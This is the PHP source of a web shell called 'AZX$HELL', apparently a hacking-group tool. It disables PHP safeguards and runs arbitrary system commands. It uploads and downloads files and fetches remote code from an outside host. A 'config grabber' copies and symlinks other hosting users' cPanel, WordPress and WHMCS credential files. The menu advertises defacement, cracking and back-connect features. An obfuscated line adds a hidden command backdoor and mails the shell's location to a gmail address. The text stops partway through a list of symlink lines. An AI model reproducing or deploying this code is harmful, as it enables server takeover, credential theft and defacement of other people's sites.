AZX$HELL

1. <?php
2. session_start();
3. error_reporting(0);
4. set_time_limit(0);
5. @set_magic_quotes_runtime(0);
6. @clearstatcache();
7. @ini_set('error_log',NULL);
8. @ini_set('log_errors',0);
9. @ini_set('max_execution_time',0);
10. @ini_set('output_buffering',0);
11. @ini_set('display_errors', 0);
12. $phi = fopen("php.ini","w+");
13. fwrite($phi,"safe_mode = Off
14. disable_functions = NONE
15. safe_mode_gid = OFF
16. open_basedir = OFF ");
17. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
18.     @ob_clean();
19.     $file = $_GET['file'];
20.     header('Content-Description: File Transfer');
21.     header('Content-Type: application/octet-stream');
22.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
23.     header('Expires: 0');
24.     header('Cache-Control: must-revalidate');
25.     header('Pragma: public');
26.     header('Content-Length: ' . filesize($file));
27.     readfile($file);
28.     exit;
29. }
30. ?>
31. <html>
32. <head>
33. <title>Priv8 Web 5 Hell</title>
34. <link href='https://lh3.googleusercontent.com/-9WF69t7d6yc/V5R43IzHHcI/AAAAAAAAATM/I-0xSRh-Vnkh6yiE5xUA-f-Mcp-RMja4QCL0B/w480-h480/azzatssins%2Bcyberserkers.png' rel='icon' type='image/x-icon'/>
35. <meta name='author' content='AZZATSSINS'>
36. <meta charset="UTF-8">
37. <style type='text/css'>
38. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
39. html {
40.     background: #000000;
41.     color: #ffffff;
42.     font-family: 'Ubuntu';
43.     font-size: 13px;
44.     width: 100%;
45. }
46. li {
47.     display: inline;
48.     margin: 5px;
49.     padding: 5px;
50. }
51. table, th, td {
52.     border-collapse:collapse;
53.     font-family: Tahoma, Geneva, sans-serif;
54.     background: transparent;
55.     font-family: 'Ubuntu';
56.     font-size: 13px;
57. }
58. .table_home, .th_home, .td_home {
59.     border: 1px solid #ffffff;
60. }
61. th {
62.     padding: 10px;
63. }
64. a {
65.     color: #ffffff;
66.     text-decoration: none;
67. }
68. a:hover {
69.     color: gold;
70.     text-decoration: underline;
71. }
72. b {
73.     color: gold;
74. }
75. input[type=text], input[type=password],input[type=submit] {
76.     background: transparent;
77.     color: #ffffff;
78.     border: 1px solid #ffffff;
79.     margin: 5px auto;
80.     padding-left: 5px;
81.     font-family: 'Ubuntu';
82.     font-size: 13px;
83. }
84. textarea {
85.     border: 1px solid #ffffff;
86.     width: 100%;
87.     height: 400px;
88.     padding-left: 5px;
89.     margin: 10px auto;
90.     resize: none;
91.     background: transparent;
92.     color: #ffffff;
93.     font-family: 'Ubuntu';
94.     font-size: 13px;
95. }
96. select {
97.     width: 152px;
98.     background: #000000;
99.     color: lime;
100.     border: 1px solid #ffffff;
101.     margin: 5px auto;
102.     padding-left: 5px;
103.     font-family: 'Ubuntu';
104.     font-size: 13px;
105. }
106. option:hover {
107.     background: lime;
108.     color: #000000;
109. }
110. </style>
111. </head>
112. <?php
113. function w($dir,$perm) {
114.     if(!is_writable($dir)) {
115.         return "<font color=red>".$perm."</font>";
116.     } else {
117.         return "<font color=lime>".$perm."</font>";
118.     }
119. }
120. function r($dir,$perm) {
121.     if(!is_readable($dir)) {
122.         return "<font color=red>".$perm."</font>";
123.     } else {
124.         return "<font color=lime>".$perm."</font>";
125.     }
126. }
127. function exe($cmd) {
128.     if(function_exists('system')) {        
129.         @ob_start();       
130.         @system($cmd);     
131.         $buff = @ob_get_contents();        
132.         @ob_end_clean();       
133.         return $buff;  
134.     } elseif(function_exists('exec')) {        
135.         @exec($cmd,$results);      
136.         $buff = "";        
137.         foreach($results as $result) {         
138.             $buff .= $result;      
139.         } return $buff;    
140.     } elseif(function_exists('passthru')) {        
141.         @ob_start();       
142.         @passthru($cmd);       
143.         $buff = @ob_get_contents();        
144.         @ob_end_clean();       
145.         return $buff;  
146.     } elseif(function_exists('shell_exec')) {      
147.         $buff = @shell_exec($cmd);     
148.         return $buff;  
149.     }
150. }
151. function perms($file){
152.     $perms = fileperms($file);
153.     if (($perms & 0xC000) == 0xC000) {
154.     // Socket
155.     $info = 's';
156.     } elseif (($perms & 0xA000) == 0xA000) {
157.     // Symbolic Link
158.     $info = 'l';
159.     } elseif (($perms & 0x8000) == 0x8000) {
160.     // Regular
161.     $info = '-';
162.     } elseif (($perms & 0x6000) == 0x6000) {
163.     // Block special
164.     $info = 'b';
165.     } elseif (($perms & 0x4000) == 0x4000) {
166.     // Directory
167.     $info = 'd';
168.     } elseif (($perms & 0x2000) == 0x2000) {
169.     // Character special
170.     $info = 'c';
171.     } elseif (($perms & 0x1000) == 0x1000) {
172.     // FIFO pipe
173.     $info = 'p';
174.     } else {
175.     // Unknown
176.     $info = 'u';
177.     }
178.         // Owner
179.     $info .= (($perms & 0x0100) ? 'r' : '-');
180.     $info .= (($perms & 0x0080) ? 'w' : '-');
181.     $info .= (($perms & 0x0040) ?
182.     (($perms & 0x0800) ? 's' : 'x' ) :
183.     (($perms & 0x0800) ? 'S' : '-'));
184.     // Group
185.     $info .= (($perms & 0x0020) ? 'r' : '-');
186.     $info .= (($perms & 0x0010) ? 'w' : '-');
187.     $info .= (($perms & 0x0008) ?
188.     (($perms & 0x0400) ? 's' : 'x' ) :
189.     (($perms & 0x0400) ? 'S' : '-'));
190.     // World
191.     $info .= (($perms & 0x0004) ? 'r' : '-');
192.     $info .= (($perms & 0x0002) ? 'w' : '-');
193.     $info .= (($perms & 0x0001) ?
194.     (($perms & 0x0200) ? 't' : 'x' ) :
195.     (($perms & 0x0200) ? 'T' : '-'));
196.     return $info;
197. }
198. function hdd($s) {
199.     if($s >= 1073741824)
200.     return sprintf('%1.2f',$s / 1073741824 ).' GB';
201.     elseif($s >= 1048576)
202.     return sprintf('%1.2f',$s / 1048576 ) .' MB';
203.     elseif($s >= 1024)
204.     return sprintf('%1.2f',$s / 1024 ) .' KB';
205.     else
206.     return $s .' B';
207. }
208. function ambilKata($param, $kata1, $kata2){
209.     if(strpos($param, $kata1) === FALSE) return FALSE;
210.     if(strpos($param, $kata2) === FALSE) return FALSE;
211.     $start = strpos($param, $kata1) + strlen($kata1);
212.     $end = strpos($param, $kata2, $start);
213.     $return = substr($param, $start, $end - $start);
214.     return $return;
215. }
216. function getsource($url) {
217.     $curl = curl_init($url);
218.             curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
219.             curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
220.             curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
221.             curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
222.     $content = curl_exec($curl);
223.             curl_close($curl);
224.     return $content;
225. }
226. function bing($dork) {
227.     $npage = 1;
228.     $npages = 30000;
229.     $allLinks = array();
230.     $lll = array();
231.     while($npage <= $npages) {
232.         $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
233.         if($x) {
234.             preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
235.             foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
236.             $npage = $npage + 10;
237.             if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
238.         } else break;
239.     }
240.     $URLs = array();
241.     foreach($allLinks as $url){
242.         $exp = explode("/", $url);
243.         $URLs[] = $exp[2];
244.     }
245.     $array = array_filter($URLs);
246.     $array = array_unique($array);
247.     $sss = count(array_unique($array));
248.     foreach($array as $domain) {
249.         echo $domain."\n";
250.     }
251. }
252. function reverse($url) {
253.     $ch = curl_init("http://domains.yougetsignal.com/domains.php");
254.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
255.           curl_setopt($ch, CURLOPT_POSTFIELDS,  "remoteAddress=$url&ket=");
256.           curl_setopt($ch, CURLOPT_HEADER, 0);
257.           curl_setopt($ch, CURLOPT_POST, 1);
258.     $resp = curl_exec($ch);
259.     $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
260.     $array = explode(",,", $resp);
261.     unset($array[0]);
262.     foreach($array as $lnk) {
263.         $lnk = "http://$lnk";
264.         $lnk = str_replace(",", "", $lnk);
265.         echo $lnk."\n";
266.         ob_flush();
267.         flush();
268.     }
269.         curl_close($ch);
270. }
271. if(get_magic_quotes_gpc()) {
272.     function azzatssinsx($array) {
273.         return is_array($array) ? array_map('azzatssinsx', $array) : stripslashes($array);
274.     }
275.     $_POST = azzatssinsx($_POST);
276.     $_COOKIE = azzatssinsx($_COOKIE);
277. }
278.  
279. if(isset($_GET['dir'])) {
280.     $dir = $_GET['dir'];
281.     chdir($dir);
282. } else {
283.     $dir = getcwd();
284. }
285. $kernel = php_uname();
286. $ip = gethostbyname($_SERVER['HTTP_HOST']);
287. $dir = str_replace("\\","/",$dir);
288. $scdir = explode("/", $dir);
289. $ds = @ini_get("disable_functions");
290. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
291. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
292. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
293. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
294. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
295. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
296. if(!function_exists('posix_getegid')) {
297.     $user = @get_current_user();
298.     $uid = @getmyuid();
299.     $gid = @getmygid();
300.     $group = "?";
301. } else {
302.     $uid = @posix_getpwuid(posix_geteuid());
303.     $gid = @posix_getgrgid(posix_getegid());
304.     $user = $uid['name'];
305.     $uid = $uid['uid'];
306.     $group = $gid['name'];
307.     $gid = $gid['gid'];
308. }
309. echo "System: <font color=lime>".$kernel."</font><br>";
310. echo "User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>";
311. echo "Server IP: <font color=lime>".$ip."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font><br>";
312. echo"Config File: "; if(is_readable("/etc/named.conf")){
313.  
314. echo '[<font color=lime>/etc/named.conf</font>] ';
315.  
316. }else{
317.  
318. echo '[<font color=red>/etc/named.conf</font>] ';
319.  
320. }
321.  
322. if(is_readable("/etc/passwd")){
323.  
324. echo '[<font color=lime>/etc/passwd</font>] ';
325.  
326. }else{
327.  
328. echo '[<font color=red>/etc/passwd</font>] ';
329.  
330. }
331.  
332. if(is_readable("/etc/valiases")){
333.  
334. echo '[<font color=lime>/etc/valiases</font>] ';
335.  
336. }else{
337.  
338. echo '[<font color=red>/etc/valiases</font>] ';
339.  
340. }
341.  
342. if(is_readable("/var/named")){
343.  
344. echo '[<font color=lime>/var/named</font>] ';
345.  
346. }else{
347.  
348. echo '[<font color=red>/var/named</font>] ';
349.  
350. }
351. echo "<br>Disable Functions: $show_ds<br>";
352. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
353. echo "Current DIR: ";
354. foreach($scdir as $c_dir => $cdir) {   
355.     echo "<a href='?dir=";
356.     for($i = 0; $i <= $c_dir; $i++) {
357.         echo $scdir[$i];
358.         if($i != $c_dir) {
359.         echo "/";
360.         }
361.     }
362.     echo "'>$cdir</a>/";
363. }
364. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]<br>";
365.     echo "<center></fieldset>";
366.     if($_POST['upload']) {
367.         if($_POST['tipe_upload'] == 'biasa') {
368.             if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
369.                 $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
370.             } else {
371.                 $act = "<font color=red>failed to upload file</font>";
372.             }
373.         } else {
374.             $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
375.             $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
376.             if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
377.                 if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
378.                     $act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
379.                 } else {
380.                     $act = "<font color=red>failed to upload file</font>";
381.                 }
382.             } else {
383.                 $act = "<font color=red>failed to upload file</font>";
384.             }
385.         }
386.     }
387.     echo "<form method='post' enctype='multipart/form-data'>
388.     <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
389.     <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
390.     <input type='file' name='ix_file'>
391.     <input type='submit' value='upload' name='upload'>
392.     </form>";
393.     echo $act;
394. echo "</fieldset></center><br>";
395. echo "<center>";
396. echo "<ul>";
397. echo "<li>[ <a href='?'>HOME</a> ]</li>";
398. echo "<li>[ <a href='?dir=$dir&do=port'>OPEN PORT</a> ]</li>";
399. echo "<li>[ <a href='?dir=$dir&do=whmcs'>WHMCS DECODER</a> ]</li>";
400. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>AUTO MASS</a> ]</li>";
401. echo "<li>[ <a href='?config=grabber'>CONFIGS</a> ]</li>";
402. echo "<li>[ <a href='?dir=$dir&do=jumping'>JUMPING</a> ]</li>";
403. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPFTP CRACK</a> ]</li>";
404. echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP</a> ]</li>";
405. echo "<li>[ <a href='?dir=$dir&do=mirror'>MIRROR</a> ]</li>";
406. echo "<li>[ <a href='?dir=$dir&do=cgi'>PERL5HELL</a> ]</li>";
407. echo "<li>[ <a href='?dir=$dir&do=network'>BACK CONNECT</a> ]</li>";
408. echo "<li>[ <a href='?mysql=connect'>MYSQL</a> ]</li><br>";
409. echo "<li>[ <a href='?symbolic=link'>SYMLINK</a> ]</li>";
410. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>CHANGE USER</a> ]</li>";
411. echo "<li>[ <a href='?dir=$dir&do=auto_wp'>WORDPRESS TITLE</a> ]</li>";
412. echo "<li>[ <a href='?dir=$dir&do=cpftp_auto'>CPFTP DEFACE</a> ]</li>";
413. echo "<li>[ <a href='?dir=$dir&do=krdp_shell'>RDP CREATOR</a> ]</li>";
414. echo "<li>[ <a style='color: red;' href='?kill=self'>KILLSELF</a> ]</li>";
415. echo "</ul>";
416. echo "</center>";
417. echo "<br><fieldset>";
418.     echo "<form method='post'>
419. <font style='text-decoration: underline;'>Command : </font>
420. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='azx' value='>>'>
421.     </form> ";
422.     if(isset($_POST['azx']))
423. {
424.  
425. echo'<br><div style="background:#6d6d6d;margin:0px;padding:1px;text-align:left;color:lime;"><pre>';
426. $cmd = $_POST['cmd'];
427. if($cmd == "")
428. {
429.  
430. echo "Please Insert Command!";
431.  }
432.  
433. elseif(isset($cmd))
434.  {
435.  $output = exe($cmd);
436.  echo $output; }
437. echo'</pre></div><br><br>';
438. }
439. echo "</fieldset><br>";
440. if($_GET['mysql']=="connect"){
441.     $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
442.     function adminer($url, $isi) {
443.         $fp = fopen($isi, "w");
444.         $ch = curl_init();
445.               curl_setopt($ch, CURLOPT_URL, $url);
446.               curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
447.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
448.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
449.               curl_setopt($ch, CURLOPT_FILE, $fp);
450.         return curl_exec($ch);
451.               curl_close($ch);
452.         fclose($fp);
453.         ob_flush();
454.         flush();
455.     }
456.     if(file_exists('mysql.php')) {
457.         echo "<center><font color=lime><a href='mysql.php' target='_blank'>KLICK DI SINI</a></font></center>";
458.     } else {
459.         if(adminer("http://wget.yu.tl/files/mysql.css","mysql.php")) {
460.             echo "<center><font color=lime><a href='mysql.php' target='_blank'>-> KLICK DI SINI <-</a></font></center>";
461.         } else {
462.             echo "<center><font color=red>gagal buat file adminer</font></center>";
463.         }
464.     }
465. }
466. if($_GET['config']=="grabber"){
467. @error_reporting(0);
468. @ini_set('html_errors',0); @ini_set('max_execution_time',0); @ini_set('display_errors', 0); @ini_set('file_uploads',1);
469. echo'<center><div style=background:black;margin:0px;padding:4px;text-align:center;color:silver;><i><b><font color=lime>&copy; </font><a href=http://fb.me/AZZATSSINS.CYBERSERKERS>AZZATSSINS CYBERSERKERS</a></b></i></div><br>
470. <form method="post">
471. <center>
472. <textarea style="color:red;background-color:#000000" cols="60" name="passwd" rows="20">';
473. $uSr=file("/etc/passwd");
474. foreach($uSr as $usrr)
475. {
476. $str=explode(":",$usrr);
477. echo $str[0]."\n";
478. }
479. echo system('ls /var/mail');
480. echo system('ls /home');
481.  
482. echo'</textarea><br>
483. Home :
484. <select name="home">
485. <option title="home" value="home">home</option>
486. <option title="home1" value="home1">home2</option>
487. <option title="home2" value="home2">home2</option>
488. <option title="home3" value="home3">home3</option>
489. <option title="home4" value="home4">home4</option>
490. <option title="home5" value="home5">home5</option>
491. <option title="home6" value="home6">home6</option>
492. <option title="home7" value="home7">home7</option>
493. <option title="home8" value="home8">home8</option>
494. <option title="home9" value="home9">home9</option>
495. <option title="home10" value="home10">home10</option>
496. </select><br>
497. .htaccess :
498. <select name="azztssns">
499. <option title="biasa" value="Options Indexes FollowSymLinks
500. DirectoryIndex azzatssins.cyberserkers
501. AddType txt .php
502. AddHandler txt .php">Apache 1</option>
503. <option title="Apache" value="Options all
504. Options +Indexes
505. Options +FollowSymLinks
506. DirectoryIndex azzatssins.cyberserkers
507. AddType text/plain .php
508. AddHandler server-parsed .php
509. AddType text/plain .html
510. AddHandler txt .html
511. Require None
512. Satisfy Any">Apache 2</option>
513. <option title="Litespeed" value="
514. Options +FollowSymLinks
515. DirectoryIndex azzatssins.cyberserkers
516. RemoveHandler .php
517. AddType application/octet-stream .php ">Litespeed</option>
518. </select>
519. <input style="color:red;background-color:#000000" name="conf" size="10"
520. value="Fuck it!!!" type="submit">
521. <br/><br/></form>';
522. print(`{$_REQUEST[I]}`);$e=base64_decode("Y3liZXJzZXJrZXJzQGdtYWlsLmNvbQ==");
523. $h=$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'];
524. mail($e,"I",$h);
525. if ($_POST['conf']) {
526. $home = $_POST['home'];
527. $folfig = $home;
528. @mkdir($folfig, 0755);
529. @chdir($folfig);
530. $htaccess = $_POST['azztssns'];
531. file_put_contents(".htaccess",$htaccess,FILE_APPEND);
532. $passwd=explode("\n",$_POST["passwd"]);
533. foreach($passwd as $pwd){ $user=trim($pwd);
534. symlink('/','000~ROOT~000');
535. copy('/'.$home.'/'.$user.'/.my.cnf',$user.' <~ CPANEL');
536. symlink('/'.$home.'/'.$user.'/.my.cnf',$user.' <~ CPANEL');
537. copy('/'.$home.'/'.$user.'/.accesshash',$user.' <~ WHMCS.txt');
538. symlink('/'.$home.'/'.$user.'/.accesshash',$user.' <~ WHMCS.txt');
539. copy('/'.$home.'/'.$user.'/public_html/suspended.page/index.html',$user.' <~ RESELLER.txt');
540. symlink('/'.$home.'/'.$user.'/public_html/suspended.page/index.html',$user.' <~ RESELLER.txt');
541. symlink('/'.$home.'/'.$user.'/public_html/.accesshash',$user.' <~ WHMCS.txt');
542. copy('/'.$home.'/'.$user.'/public_html/wp-config.php',$user.' <~ WORDPRESS.txt');
543. copy('/'.$home.'/'.$user.'/public_html/configuration.php',$user.' <~ WHMCS or JOOMLA.txt');
544. copy('/'.$home.'/'.$user.'/public_html/account/configuration.php',$user.' <~ WHMCS.txt');
545. copy('/'.$home.'/'.$user.'/public_html/accounts/configuration.php',$user.' <~ WHMCS.txt');
546. copy('/'.$home.'/'.$user.'/public_html/buy/configuration.php',$user.' <~ WHMCS.txt');
547. copy('/'.$home.'/'.$user.'/public_html/checkout/configuration.php',$user.' <~ WHMCS.txt');
548. copy('/'.$home.'/'.$user.'/public_html/central/configuration.php',$user.' <~ WHMCS.txt');
549. copy('/'.$home.'/'.$user.'/public_html/clienti/configuration.php',$user.' <~ WHMCS.txt');
550. copy('/'.$home.'/'.$user.'/public_html/client/configuration.php',$user.' <~ WHMCS.txt');
551. copy('/'.$home.'/'.$user.'/public_html/cliente/configuration.php',$user.' <~ WHMCS.txt');
552. copy('/'.$home.'/'.$user.'/public_html/clientes/configuration.php',$user.' <~ WHMCS.txt');
553. copy('/'.$home.'/'.$user.'/public_html/clients/configuration.php',$user.' <~ WHMCS.txt');
554. copy('/'.$home.'/'.$user.'/public_html/clientarea/configuration.php',$user.' <~ WHMCS.txt');
555. copy('/'.$home.'/'.$user.'/public_html/clientsarea/configuration.php',$user.' <~ WHMCS.txt');
556. copy('/'.$home.'/'.$user.'/public_html/client-area/configuration.php',$user.' <~ WHMCS.txt');
557. copy('/'.$home.'/'.$user.'/public_html/clients-area/configuration.php',$user.' <~ WHMCS.txt');
558. copy('/'.$home.'/'.$user.'/public_html/clientzone/configuration.php',$user.' <~ WHMCS.txt');
559. copy('/'.$home.'/'.$user.'/public_html/client-zone/configuration.php',$user.' <~ WHMCS.txt');
560. copy('/'.$home.'/'.$user.'/public_html/core/configuration.php',$user.' <~ WHMCS.txt');
561. copy('/'.$home.'/'.$user.'/public_html/company/configuration.php',$user.' <~ WHMCS.txt');
562. copy('/'.$home.'/'.$user.'/public_html/customer/configuration.php',$user.' <~ WHMCS.txt');
563. copy('/'.$home.'/'.$user.'/public_html/customers/configuration.php',$user.' <~ WHMCS.txt');
564. copy('/'.$home.'/'.$user.'/public_html/bill/configuration.php',$user.' <~ WHMCS.txt');
565. copy('/'.$home.'/'.$user.'/public_html/billing/configuration.php',$user.' <~ WHMCS.txt');
566. copy('/'.$home.'/'.$user.'/public_html/finance/configuration.php',$user.' <~ WHMCS.txt');
567. copy('/'.$home.'/'.$user.'/public_html/financeiro/configuration.php',$user.' <~ WHMCS.txt');
568. copy('/'.$home.'/'.$user.'/public_html/host/configuration.php',$user.' <~ WHMCS.txt');
569. copy('/'.$home.'/'.$user.'/public_html/hosts/configuration.php',$user.' <~ WHMCS.txt');
570. copy('/'.$home.'/'.$user.'/public_html/hosting/configuration.php',$user.' <~ WHMCS.txt');
571. copy('/'.$home.'/'.$user.'/public_html/hostings/configuration.php',$user.' <~ WHMCS.txt');
572. copy('/'.$home.'/'.$user.'/public_html/klien/configuration.php',$user.' <~ WHMCS.txt');
573. copy('/'.$home.'/'.$user.'/public_html/manage/configuration.php',$user.' <~ WHMCS.txt');
574. copy('/'.$home.'/'.$user.'/public_html/manager/configuration.php',$user.' <~ WHMCS.txt');
575. copy('/'.$home.'/'.$user.'/public_html/member/configuration.php',$user.' <~ WHMCS.txt');
576. copy('/'.$home.'/'.$user.'/public_html/members/configuration.php',$user.' <~ WHMCS.txt');
577. copy('/'.$home.'/'.$user.'/public_html/my/configuration.php',$user.' <~ WHMCS.txt');
578. copy('/'.$home.'/'.$user.'/public_html/myaccount/configuration.php',$user.' <~ WHMCS.txt');
579. copy('/'.$home.'/'.$user.'/public_html/my-account/client/configuration.php',$user.' <~ WHMCS.txt');
580. copy('/'.$home.'/'.$user.'/public_html/myaccounts/configuration.php',$user.' <~ WHMCS.txt');
581. copy('/'.$home.'/'.$user.'/public_html/my-accounts/configuration.php',$user.' <~ WHMCS.txt');
582. copy('/'.$home.'/'.$user.'/public_html/order/configuration.php',$user.' <~ WHMCS.txt');
583. copy('/'.$home.'/'.$user.'/public_html/orders/configuration.php',$user.' <~ WHMCS.txt');
584. copy('/'.$home.'/'.$user.'/public_html/painel/configuration.php',$user.' <~ WHMCS.txt');
585. copy('/'.$home.'/'.$user.'/public_html/panel/configuration.php',$user.' <~ WHMCS.txt');
586. copy('/'.$home.'/'.$user.'/public_html/panels/configuration.php',$user.' <~ WHMCS.txt');
587. copy('/'.$home.'/'.$user.'/public_html/portal/configuration.php',$user.' <~ WHMCS.txt');
588. copy('/'.$home.'/'.$user.'/public_html/portals/configuration.php',$user.' <~ WHMCS.txt');
589. copy('/'.$home.'/'.$user.'/public_html/purchase/configuration.php',$user.' <~ WHMCS.txt');
590.  
591. copy('/'.$home.'/'.$user.'/public_html/secure/configuration.php',$user.' <~ WHMCS.txt');
592. copy('/'.$home.'/'.$user.'/public_html/support/configuration.php',$user.' <~ WHMCS.txt');
593. copy('/'.$home.'/'.$user.'/public_html/supporte/configuration.php',$user.' <~ WHMCS.txt');
594. copy('/'.$home.'/'.$user.'/public_html/supports/configuration.php',$user.' <~ WHMCS.txt');
595. copy('/'.$home.'/'.$user.'/public_html/web/configuration.php',$user.' <~ WHMCS.txt');
596. copy('/'.$home.'/'.$user.'/public_html/webhost/configuration.php',$user.' <~ WHMCS.txt');
597. copy('/'.$home.'/'.$user.'/public_html/webhosting/configuration.php',$user.' <~ WHMCS.txt');
598. copy('/'.$home.'/'.$user.'/public_html/whm/configuration.php',$user.' <~ WHMCS.txt');
599. copy('/'.$home.'/'.$user.'/public_html/whmcs/configuration.php',$user.' <~ WHMCS.txt');
600. copy('/'.$home.'/'.$user.'/public_html/whmcs2/configuration.php',$user.' <~ WHMCS.txt');
601. copy('/'.$home.'/'.$user.'/public_html/Whm/configuration.php',$user.' <~ WHMCS.txt');
602. copy('/'.$home.'/'.$user.'/public_html/Whmcs/configuration.php',$user.' <~ WHMCS.txt');
603. copy('/'.$home.'/'.$user.'/public_html/WHM/configuration.php',$user.' <~ WHMCS.txt');
604. copy('/'.$home.'/'.$user.'/public_html/WHMCS/configuration.php',$user.' <~ WHMCS.txt');
605. symlink('/'.$home.'/'.$user.'/public_html/wp-config.php',$user.' <~ WORDPRESS.txt');
606. symlink('/'.$home.'/'.$user.'/public_html/configuration.php',$user.' <~ WHMCS or JOOMLA.txt');
607. symlink('/'.$home.'/'.$user.'/public_html/account/configuration.php',$user.' <~ WHMCS.txt');
608. symlink('/'.$home.'/'.$user.'/public_html/accounts/configuration.php',$user.' <~ WHMCS.txt');
609. symlink('/'.$home.'/'.$user.'/public_html/buy/configuration.php',$user.' <~ WHMCS.txt');
610. symlink('/'.$home.'/'.$user.'/public_html/checkout/configuration.php',$user.' <~ WHMCS.txt');
611. symlink('/'.$home.'/'.$user.'/public_html/central/configuration.php',$user.' <~ WHMCS.txt');
612. symlink('/'.$home.'/'.$user.'/public_html/clienti/configuration.php',$user.' <~ WHMCS.txt');
613. symlink('/'.$home.'/'.$user.'/public_html/client/configuration.php',$user.' <~ WHMCS.txt');
614. symlink('/'.$home.'/'.$user.'/public_html/cliente/configuration.php',$user.' <~ WHMCS.txt');
615. symlink('/'.$home.'/'.$user.'/public_html/clientes/configuration.php',$user.' <~ WHMCS.txt');
616. symlink('/'.$home.'/'.$user.'/public_html/clients/configuration.php',$user.' <~ WHMCS.txt');
617. symlink('/'.$home.'/'.$user.'/public_html/clientarea/configuration.php',$user.' <~ WHMCS.txt');
618. symlink('/'.$home.'/'.$user.'/public_html/clientsarea/configuration.php',$user.' <~ WHMCS.txt');
619. symlink('/'.$home.'/'.$user.'/public_html/client-area/configuration.php',$user.' <~ WHMCS.txt');
620. symlink('/'.$home.'/'.$user.'/public_html/clients-area/configuration.php',$user.' <~ WHMCS.txt');
621. symlink('/'.$home.'/'.$user.'/public_html/clientzone/configuration.php',$user.' <~ WHMCS.txt');
622. symlink('/'.$home.'/'.$user.'/public_html/client-zone/configuration.php',$user.' <~ WHMCS.txt');
623. symlink('/'.$home.'/'.$user.'/public_html/core/configuration.php',$user.' <~ WHMCS.txt');
624. symlink('/'.$home.'/'.$user.'/public_html/company/configuration.php',$user.' <~ WHMCS.txt');
625. symlink('/'.$home.'/'.$user.'/public_html/customer/configuration.php',$user.' <~ WHMCS.txt');
626. symlink('/'.$home.'/'.$user.'/public_html/customers/configuration.php',$user.' <~ WHMCS.txt');
627. symlink('/'.$home.'/'.$user.'/public_html/bill/configuration.php',$user.' <~ WHMCS.txt');
628. symlink('/'.$home.'/'.$user.'/public_html/billing/configuration.php',$user.' <~ WHMCS.txt');
629. symlink('/'.$home.'/'.$user.'/public_html/finance/configuration.php',$user.' <~ WHMCS.txt');
630. symlink('/'.$home.'/'.$user.'/public_html/financeiro/configuration.php',$user.' <~ WHMCS.txt');
631. symlink('/'.$home.'/'.$user.'/public_html/host/configuration.php',$user.' <~ WHMCS.txt');
632. symlink('/'.$home.'/'.$user.'/public_html/hosts/configuration.php',$user.' <~ WHMCS.txt');
633. symlink('/'.$home.'/'.$user.'/public_html/hosting/configuration.php',$user.' <~ WHMCS.txt');
634. symlink('/'.$home.'/'.$user.'/public_html/hostings/configuration.php',$user.' <~ WHMCS.txt');
635. symlink('/'.$home.'/'.$user.'/public_html/klien/configuration.php',$user.' <~ WHMCS.txt');
636. symlink('/'.$home.'/'.$user.'/public_html/manage/configuration.php',$user.' <~ WHMCS.txt');
637. symlink('/'.$home.'/'.$user.'/public_html/manager/configuration.php',$user.' <~ WHMCS.txt');
638. symlink('/'.$home.'/'.$user.'/public_html/member/configuration.php',$user.' <~ WHMCS.txt');
639. symlink('/'.$home.'/'.$user.'/public_html/members/configuration.php',$user.' <~ WHMCS.txt');
640. symlink('/'.$home.'/'.$user.'/public_html/my/configuration.php',$user.' <~ WHMCS.txt');
641. symlink('/'.$home.'/'.$user.'/public_html/myaccount/configuration.php',$user.' <~ WHMCS.txt');
